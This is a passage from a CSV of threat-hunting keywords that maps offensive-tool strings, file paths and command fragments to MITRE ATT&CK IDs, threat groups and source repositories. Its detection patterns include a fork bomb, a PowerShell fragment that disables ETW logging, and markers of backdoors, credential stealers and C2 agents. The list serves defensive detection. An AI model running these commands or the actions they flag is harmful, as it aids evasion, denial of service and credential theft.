etc.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/yanghaoi/CobaltStrike_CNA,1,1,N/A,10,10,402,78,2022-01-18T12:47:55Z,2021-04-21T13:10:11Z -*/ysoserial/*,offensive_tool_keyword,ysoserial.net,Deserialization payload generator for a variety of .NET formatters,T1059.007 - T1027.002 - T1059.001,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/pwntester/ysoserial.net,1,1,N/A,10,10,2723,442,2023-06-27T12:08:11Z,2017-09-18T17:48:08Z -*/zejius/2HZG41Zw/6Vtmo6w4yQ5tnsBHms64.php*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,1,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*/zejius/2HZG41Zw/fJsnC6G4sFg2wsyn4shb.bin*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,1,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*/zejius/5GPR0iy9/6Vtmo6w4yQ5tnsBHms64.php*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,1,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*/zejius/5GPR0iy9/fJsnC6G4sFg2wsyn4shb.bin*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation 
tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,1,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*/zerologon.cna*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF zerologon exploit,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/ZeroLogon-BOF,1,1,N/A,10,10,148,40,2022-04-25T11:22:45Z,2020-09-17T02:07:13Z -*/zerologon.py*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z -*/zhzyker/CVE-2020-5902*,offensive_tool_keyword,POC,exploit code for F5-Big-IP (CVE-2020-5902),T1210,TA0008,N/A,N/A,Exploitation tools,https://github.com/zhzyker/CVE-2020-5902/,1,0,N/A,N/A,1,13,8,2020-07-08T04:10:12Z,2020-07-08T04:02:07Z -*/zsh_executor/*.go*,offensive_tool_keyword,mythic,mythic C2 agent,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - 
T1204,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/freyja/,1,1,N/A,10,10,11,6,2023-06-30T16:35:47Z,2022-09-28T17:20:04Z -*/zwjjustdoit/cve-2022-23131*,offensive_tool_keyword,POC,POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML),T1548 - T1190,TA0002 - TA0006 - TA0009,N/A,N/A,Exploitation tools,https://github.com/zwjjustdoit/cve-2022-23131,1,1,N/A,N/A,1,0,3,2022-02-21T04:55:57Z,2022-02-21T02:42:23Z -*:(){:I: &I*,greyware_tool_keyword,linux,fork bomb linux - denial-of-service attack wherein a process continually replicates itself to deplete available system resources slowing down or crashing the system due to resource starvation,T1499,TA0040,N/A,N/A,Exploitation Tools,https://github.com/RoseSecurity/Red-Teaming-TTPs,1,0,N/A,N/A,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*:\ProgramData\RecoverySystem\recoveryWindows.zip*,offensive_tool_keyword,SysJoker,SysJoker backdoor - multi-platform backdoor that targets Windows Mac and Linux,T1105 - T1140 - T1497 - T1059 - T1070 - T1016 - T1082 - T1074,TA0003 - TA0006 - TA0011 - TA0001 - TA0009 - TA0010 - TA0008 - TA0002,sysjocker,N/A,Exploitation tools,https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*:\ProgramData\SystemData\igfxCUIService.exe*,offensive_tool_keyword,SysJoker,SysJoker backdoor - multi-platform backdoor that targets Windows Mac and Linux,T1105 - T1140 - T1497 - T1059 - T1070 - T1016 - T1082 - T1074,TA0003 - TA0006 - TA0011 - TA0001 - TA0009 - TA0010 - TA0008 - TA0002,sysjocker,N/A,Exploitation tools,https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*:\ProgramData\SystemData\tempo1.txt*,offensive_tool_keyword,SysJoker,SysJoker backdoor - multi-platform backdoor that targets Windows Mac and Linux,T1105 - 
T1140 - T1497 - T1059 - T1070 - T1016 - T1082 - T1074,TA0003 - TA0006 - TA0011 - TA0001 - TA0009 - TA0010 - TA0008 - TA0002,sysjocker,N/A,Exploitation tools,https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*:\ProgramData\SystemData\tempo2.txt*,offensive_tool_keyword,SysJoker,SysJoker backdoor - multi-platform backdoor that targets Windows Mac and Linux,T1105 - T1140 - T1497 - T1059 - T1070 - T1016 - T1082 - T1074,TA0003 - TA0006 - TA0011 - TA0001 - TA0009 - TA0010 - TA0008 - TA0002,sysjocker,N/A,Exploitation tools,https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*:\Users\Public\Music\*.dll*,offensive_tool_keyword,RDPCredentialStealer,RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++,T1555.001 - T1059.002 - T1552.002,TA0006 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/S12cybersecurity/RDPCredentialStealer,1,0,N/A,10,2,196,34,2023-06-14T10:25:33Z,2023-06-13T01:30:26Z -*:'123pentest'*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*:8999/Payloads/*,offensive_tool_keyword,primusC2,another C2 framework,T1090 - T1071,TA0011 - TA0002,N/A,N/A,C2,https://github.com/Primusinterp/PrimusC2,1,1,N/A,10,10,42,4,2023-08-21T04:05:48Z,2023-04-19T10:59:30Z -*:9090*/api/v1.0/relays*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*?convert_ccache_to_kirbi*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*?convert_kirbi_to_ccache*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*?PSAmsi*PSReflect.ps1*,offensive_tool_keyword,PSAmsi,PSAmsi is a tool for auditing and defeating AMSI signatures.,T1059.001 - T1562.001 - T1070.004,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/cobbr/PSAmsi,1,1,N/A,7,4,382,74,2018-04-22T20:56:33Z,2017-09-22T11:48:47Z -*?sample_sliver.json*,offensive_tool_keyword,nanorobeus,COFF file (BOF) for managing Kerberos tickets.,T1558.003 - T1208,TA0006 - TA0007,N/A,N/A,C2,https://github.com/wavvs/nanorobeus,1,0,N/A,10,10,234,28,2023-07-02T12:56:27Z,2022-07-04T00:33:30Z -*[!] Failed to enumerate Credman:*,offensive_tool_keyword,SharpAzbelt,This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources,T1082 - T1003 - T1027 - T1110 - T1078,TA0006 - TA0007 - TA0005 - TA0004 - TA0003,N/A,N/A,Discovery - Collection,https://github.com/redskal/SharpAzbelt,1,0,N/A,8,1,23,6,2023-09-21T21:47:32Z,2023-09-21T21:44:03Z -*[!] Failed to download legitimate GPO from SYSVOL (dc_ip:*,offensive_tool_keyword,GPOddity,GPO attack vectors through NTLM relaying,T1558.001 - T1076 - T1552.001,TA0003 - TA0005 - TA0002,N/A,N/A,Exploitation tool,https://github.com/synacktiv/GPOddity,1,0,N/A,9,1,90,6,2023-09-10T10:59:24Z,2023-09-01T08:13:25Z -*[!] Failed to write malicious scheduled task to downloaded GPO. 
Exiting*,offensive_tool_keyword,GPOddity,GPO attack vectors through NTLM relaying,T1558.001 - T1076 - T1552.001,TA0003 - TA0005 - TA0002,N/A,N/A,Exploitation tool,https://github.com/synacktiv/GPOddity,1,0,N/A,9,1,90,6,2023-09-10T10:59:24Z,2023-09-01T08:13:25Z -*[#] Ready For ETW Patch.*,offensive_tool_keyword,Fuck-Etw,Bypass the Event Trace Windows(ETW) and unhook ntdll.,T1070.004 - T1055.001,TA0005 - TA0003,N/A,N/A,Defense Evasion,https://github.com/unkvolism/Fuck-Etw,1,0,N/A,10,1,63,9,2023-09-29T21:19:10Z,2023-09-25T18:59:10Z -*[*] Downloading the legitimate GPO from SYSVOL*,offensive_tool_keyword,GPOddity,GPO attack vectors through NTLM relaying,T1558.001 - T1076 - T1552.001,TA0003 - TA0005 - TA0002,N/A,N/A,Exploitation tool,https://github.com/synacktiv/GPOddity,1,0,N/A,9,1,90,6,2023-09-10T10:59:24Z,2023-09-01T08:13:25Z -*[*] Injecting malicious scheduled task into downloaded GPO*,offensive_tool_keyword,GPOddity,GPO attack vectors through NTLM relaying,T1558.001 - T1076 - T1552.001,TA0003 - TA0005 - TA0002,N/A,N/A,Exploitation tool,https://github.com/synacktiv/GPOddity,1,0,N/A,9,1,90,6,2023-09-10T10:59:24Z,2023-09-01T08:13:25Z -*[*] Smuggling in HTML*,offensive_tool_keyword,AutoSmuggle,Utility to craft HTML or SVG smuggled files for Red Team engagements,T1027.006 - T1598,TA0005 - TA0043,N/A,N/A,Defense Evasion,https://github.com/surajpkhetani/AutoSmuggle,1,0,N/A,9,2,141,21,2023-09-02T08:09:50Z,2022-03-20T19:02:06Z -*[*] Smuggling in SVG*,offensive_tool_keyword,AutoSmuggle,Utility to craft HTML or SVG smuggled files for Red Team engagements,T1027.006 - T1598,TA0005 - TA0043,N/A,N/A,Defense Evasion,https://github.com/surajpkhetani/AutoSmuggle,1,0,N/A,9,2,141,21,2023-09-02T08:09:50Z,2022-03-20T19:02:06Z -*[*] Updating downloaded GPO version number to ensure automatic GPO application*,offensive_tool_keyword,GPOddity,GPO attack vectors through NTLM relaying,T1558.001 - T1076 - T1552.001,TA0003 - TA0005 - TA0002,N/A,N/A,Exploitation 
tool,https://github.com/synacktiv/GPOddity,1,0,N/A,9,1,90,6,2023-09-10T10:59:24Z,2023-09-01T08:13:25Z -*[-] failed to spawn shell: %s*,offensive_tool_keyword,EQGR,Equation Group hack tool leaked by ShadowBrokers- file elgingamble Local exploit for the public prctl core dump vulnerability in recent Linux kernels,T1213.001 - T1203.001,TA0001 - TA0003,N/A,N/A,Shell spawning,https://fdik.org/EQGRP/Linux/doc/old/etc/user.tool.elgingamble.COMMON,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*[-] kernel not vulnerable*,offensive_tool_keyword,EQGR,Equation Group hack tool leaked by ShadowBrokers- file elgingamble Local exploit for the public prctl core dump vulnerability in recent Linux kernels.,T1213.001 - T1203.001,TA0001 - TA0003,N/A,N/A,Shell spawning,https://fdik.org/EQGRP/Linux/doc/old/etc/user.tool.elgingamble.COMMON,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*[-] Seems like we killed auditd. Ooopsie :D*,offensive_tool_keyword,apollon,evade auditd by writing /proc/PID/mem,T1054.001 - T1055.001 - T1012,TA0003 - TA0005,N/A,N/A,Defense Evasion,https://github.com/codewhitesec/apollon,1,0,N/A,8,1,13,5,2023-08-21T05:43:36Z,2023-07-31T11:55:43Z -*[+] Adding your DLL to the LSA Security Packages registry key*,offensive_tool_keyword,ImplantSSP,Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start,T1547.008 - T1073.001 - T1055.001,TA0003 - TA0005,N/A,N/A,Persistence - Defense Evasion,https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP,1,0,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*[+] Attack aborted. 
Exiting*,offensive_tool_keyword,ShadowSpray,A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.,T1110.003 - T1098 - T1059 - T1075,TA0001 - TA0008 - TA0009,N/A,N/A,Discovery,https://github.com/ShorSec/ShadowSpray,1,0,N/A,7,5,408,72,2022-10-14T13:36:51Z,2022-10-10T08:34:07Z -*[+] Attempting to call the target EXE from the mock directory*,offensive_tool_keyword,MockDirUACBypass,Creates a mock trusted directory C:\Windows \System32\ and moves an auto-elevating Windows executable into the mock directory. A user-supplied DLL which exports the appropriate functions is dropped and when the executable is run - the DLL is loaded and run as high integrity.,T1574.002 - T1547.008 - T1059.001,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/matterpreter/OffensiveCSharp/tree/master/MockDirUACBypass,1,0,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*[+] auditd patched successfully*,offensive_tool_keyword,apollon,evade auditd by writing /proc/PID/mem,T1054.001 - T1055.001 - T1012,TA0003 - TA0005,N/A,N/A,Defense Evasion,https://github.com/codewhitesec/apollon,1,0,N/A,8,1,13,5,2023-08-21T05:43:36Z,2023-07-31T11:55:43Z -*[+] Back to C&C Console*,offensive_tool_keyword,C2_Server,C2 server to connect to a victim machine via reverse shell,T1090 - T1090.001 - T1071 - T1071.001,TA0011 ,N/A,N/A,C2,https://github.com/reveng007/C2_Server,1,0,N/A,10,10,31,17,2022-02-27T02:00:02Z,2021-03-05T12:35:45Z -*[+] Bof replay:*,offensive_tool_keyword,Nightmangle,ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent,T1105 - T1132 - T1071.001,TA0011 - TA0009 - TA0002,N/A,N/A,C2,https://github.com/1N73LL1G3NC3x/Nightmangle,1,0,N/A,10,10,72,10,2023-09-26T19:21:31Z,2023-09-26T18:25:23Z -*[+] Creating mock directories*,offensive_tool_keyword,MockDirUACBypass,Creates a mock trusted directory C:\Windows \System32\ and moves an auto-elevating Windows executable 
into the mock directory. A user-supplied DLL which exports the appropriate functions is dropped and when the executable is run - the DLL is loaded and run as high integrity.,T1574.002 - T1547.008 - T1059.001,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/matterpreter/OffensiveCSharp/tree/master/MockDirUACBypass,1,0,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*[+] Deobfuscated dump saved in file decrypted.dmp*,offensive_tool_keyword,PPLBlade,Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.,T1003.001 - T1027.004 - T1560.001 - T1039 - T1570,TA0006 - TA0005 - TA0010 - TA0003,N/A,N/A,Credential Access - Data Exfiltration,https://github.com/tastypepperoni/PPLBlade,1,0,N/A,10,4,324,36,2023-08-30T07:59:51Z,2023-08-29T19:36:04Z -*[+] Enumerating driver services...*,offensive_tool_keyword,DriverQuery,Collect details about drivers on the system and optionally filter to find only ones not signed by Microsoft,T1124 - T1057 - T1082,TA0007 - TA0003,N/A,N/A,Discovery,https://github.com/matterpreter/OffensiveCSharp/tree/master/DriverQuery,1,0,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -"*[+] ETW Patched, No Logs No Crime !*",offensive_tool_keyword,Fuck-Etw,Bypass the Event Trace Windows(ETW) and unhook ntdll.,T1070.004 - T1055.001,TA0005 - TA0003,N/A,N/A,Defense Evasion,https://github.com/unkvolism/Fuck-Etw,1,0,N/A,10,1,63,9,2023-09-29T21:19:10Z,2023-09-25T18:59:10Z -*[+] Generated XOR key: *,offensive_tool_keyword,Supernova,securely encrypt raw shellcodes,T1027 - T1055.004 - T1140,TA0002 - TA0005 - TA0042,N/A,N/A,Exploitation tools,https://github.com/nickvourd/Supernova,1,0,N/A,10,4,337,49,2023-09-28T20:56:28Z,2023-08-08T11:30:34Z -*[+] Generating base64 encoded PowerShell script*,offensive_tool_keyword,SpaceRunner,enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes 
through the use of runspace.,T1059.001 - T1027,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/Mr-B0b/SpaceRunner,1,0,N/A,7,2,185,38,2020-07-26T10:39:53Z,2020-07-26T09:31:09Z -*[+] Keylogger started*,offensive_tool_keyword,C2_Server,C2 server to connect to a victim machine via reverse shell,T1090 - T1090.001 - T1071 - T1071.001,TA0011 ,N/A,N/A,C2,https://github.com/reveng007/C2_Server,1,0,N/A,10,10,31,17,2022-02-27T02:00:02Z,2021-03-05T12:35:45Z -*[+] Keylogger stopped*,offensive_tool_keyword,C2_Server,C2 server to connect to a victim machine via reverse shell,T1090 - T1090.001 - T1071 - T1071.001,TA0011 ,N/A,N/A,C2,https://github.com/reveng007/C2_Server,1,0,N/A,10,10,31,17,2022-02-27T02:00:02Z,2021-03-05T12:35:45Z -*[+] keystrokes dump from agent*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,0,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*[+] Opened Process Token Sucessufully!*,offensive_tool_keyword,BesoToken,A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).,T1134 - T1003.002,TA0004 - TA0006,N/A,N/A,Credential Access,https://github.com/OmriBaso/BesoToken,1,0,N/A,10,1,91,11,2022-11-23T10:45:07Z,2022-11-21T01:07:51Z -*[+] Registry key set. DLL will be loaded on reboot*,offensive_tool_keyword,ImplantSSP,Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start,T1547.008 - T1073.001 - T1055.001,TA0003 - TA0005,N/A,N/A,Persistence - Defense Evasion,https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP,1,0,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*[+] Safety checks passed. 
Implanting your DLL*,offensive_tool_keyword,ImplantSSP,Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start,T1547.008 - T1073.001 - T1055.001,TA0003 - TA0005,N/A,N/A,Persistence - Defense Evasion,https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP,1,0,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*[+] Save encrypted shellcode to *,offensive_tool_keyword,Supernova,securely encrypt raw shellcodes,T1027 - T1055.004 - T1140,TA0002 - TA0005 - TA0042,N/A,N/A,Exploitation tools,https://github.com/nickvourd/Supernova,1,0,N/A,10,4,337,49,2023-09-28T20:56:28Z,2023-08-08T11:30:34Z -*[+] SeImpersonatePrivilege enabled*,offensive_tool_keyword,Nightmangle,ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent,T1105 - T1132 - T1071.001,TA0011 - TA0009 - TA0002,N/A,N/A,C2,https://github.com/1N73LL1G3NC3x/Nightmangle,1,0,N/A,10,10,72,10,2023-09-26T19:21:31Z,2023-09-26T18:25:23Z -*[+] Stole token from*,offensive_tool_keyword,Gotato,Generic impersonation and privilege escalation with Golang. 
Like GenericPotato both named pipes and HTTP are supported.,T1003.003 - T1056.002 - T1550.001 - T1090,TA0005 - TA0004 - TA0009,N/A,N/A,Privilege Escalation,https://github.com/iammaguire/Gotato,1,0,N/A,9,2,114,16,2021-06-07T21:19:58Z,2021-06-05T22:32:48Z -*[+] Successfully downloaded legitimate GPO from SYSVOL to *,offensive_tool_keyword,GPOddity,GPO attack vectors through NTLM relaying,T1558.001 - T1076 - T1552.001,TA0003 - TA0005 - TA0002,N/A,N/A,Exploitation tool,https://github.com/synacktiv/GPOddity,1,0,N/A,9,1,90,6,2023-09-10T10:59:24Z,2023-09-01T08:13:25Z -*[+] Successfully injected malicious scheduled task*,offensive_tool_keyword,GPOddity,GPO attack vectors through NTLM relaying,T1558.001 - T1076 - T1552.001,TA0003 - TA0005 - TA0002,N/A,N/A,Exploitation tool,https://github.com/synacktiv/GPOddity,1,0,N/A,9,1,90,6,2023-09-10T10:59:24Z,2023-09-01T08:13:25Z -*[+] Successfully spoofed GPC gPCFileSysPath attribute*,offensive_tool_keyword,GPOddity,GPO attack vectors through NTLM relaying,T1558.001 - T1076 - T1552.001,TA0003 - TA0005 - TA0002,N/A,N/A,Exploitation tool,https://github.com/synacktiv/GPOddity,1,0,N/A,9,1,90,6,2023-09-10T10:59:24Z,2023-09-01T08:13:25Z -*[+] The encrypted payload with *,offensive_tool_keyword,Supernova,securely encrypt raw shellcodes,T1027 - T1055.004 - T1140,TA0002 - TA0005 - TA0042,N/A,N/A,Exploitation tools,https://github.com/nickvourd/Supernova,1,0,N/A,10,4,337,49,2023-09-28T20:56:28Z,2023-08-08T11:30:34Z -*[+] Your payload must be executed now !*,offensive_tool_keyword,SetProcessInjection,alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.,T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012,TA0005 - TA0004 - TA0002,N/A,N/A,Defense Evasion,https://github.com/OtterHacker/SetProcessInjection,1,0,N/A,9,1,53,10,2023-10-02T09:23:42Z,2023-10-02T08:21:47Z -*[i] AAD Join:*enumerate*,offensive_tool_keyword,SharpAzbelt,This is an attempt to 
port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources,T1082 - T1003 - T1027 - T1110 - T1078,TA0006 - TA0007 - TA0005 - TA0004 - TA0003,N/A,N/A,Discovery - Collection,https://github.com/redskal/SharpAzbelt,1,0,N/A,8,1,23,6,2023-09-21T21:47:32Z,2023-09-21T21:44:03Z -*[i] Credman:*Credential Blob Decrypted*,offensive_tool_keyword,SharpAzbelt,This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources,T1082 - T1003 - T1027 - T1110 - T1078,TA0006 - TA0007 - TA0005 - TA0004 - TA0003,N/A,N/A,Discovery - Collection,https://github.com/redskal/SharpAzbelt,1,0,N/A,8,1,23,6,2023-09-21T21:47:32Z,2023-09-21T21:44:03Z -*[i] Hooked Ntdll Base Address : *,offensive_tool_keyword,Fuck-Etw,Bypass the Event Trace Windows(ETW) and unhook ntdll.,T1070.004 - T1055.001,TA0005 - TA0003,N/A,N/A,Defense Evasion,https://github.com/unkvolism/Fuck-Etw,1,0,N/A,10,1,63,9,2023-09-29T21:19:10Z,2023-09-25T18:59:10Z -*[i] Unhooked Ntdll Base Address: *,offensive_tool_keyword,Fuck-Etw,Bypass the Event Trace Windows(ETW) and unhook ntdll.,T1070.004 - T1055.001,TA0005 - TA0003,N/A,N/A,Defense Evasion,https://github.com/unkvolism/Fuck-Etw,1,0,N/A,10,1,63,9,2023-09-29T21:19:10Z,2023-09-25T18:59:10Z -*[Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled'*'NonPublic*Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider'*'NonPublic*Static').GetValue($null)*0)*,offensive_tool_keyword,powershell,impair the defenses of the targeted system by disabling ETW logging for PowerShell. 
This can make it difficult for security teams to monitor and analyze PowerShell activities on the system potentially allowing adversaries to perform malicious actions without being detected,T1562,TA0040,N/A,N/A,Defense Evasion,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*['spawnto']*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - 